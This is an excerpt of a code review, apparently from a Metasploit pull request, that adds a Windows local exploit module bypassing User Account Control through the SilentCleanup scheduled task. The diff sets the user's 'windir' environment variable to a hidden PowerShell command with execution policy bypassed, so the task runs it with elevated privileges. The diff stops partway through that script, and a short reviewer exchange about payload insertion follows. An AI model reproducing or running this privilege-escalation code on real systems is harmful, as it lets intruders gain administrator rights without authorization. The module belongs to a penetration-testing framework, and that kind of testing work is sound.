modules/exploits/windows/local/bypassuac_silentcleanup.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Msf::Post::File
+  include Msf::Post::Common
+  include Msf::Exploit::FileDropper
+
+
+  PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                 => "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
+      'Description'          => %q{
+        There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
+        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
+        %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
+      },
+      'License'              => MSF_LICENSE,
+      'Author'               => [
+        'Carter Brainerd (cbrnrd)',  # Metasploit Module
+        'lokiuox'     # Vuln discovery
+      ],
+      'Platform' => ['win'],
+      'SessionTypes' => ['meterpreter'],
+      'Arch' => [ARCH_X86, ARCH_X64],
+      'Targets' => [['Microsoft Windows', {}]],
+      'DisclosureDate' => 'Feb 24 2018'
+    ))
+
+    register_options(
+      [
+        OptInt.new('SLEEPTIME', [false, "The time (ms) to sleep before running SilentCleanup", 0])
+      ])
+  end
+
+
+
+  def get_bypass_script(cmd)
+    scr = %Q{
+      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
+        #{cmd}
+      } else {
+          $registryPath = "HKCU:\\Environment"
+          $Name = "windir"
+          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
```

Comment:
Can you not insert `cmd_psh_payload`?

Reply:
The payload isn't being inserted here

Reply:
I was asking if it could be, but I don't know yet.

Reply:
I'll mess around with this. On to testing! Thanks.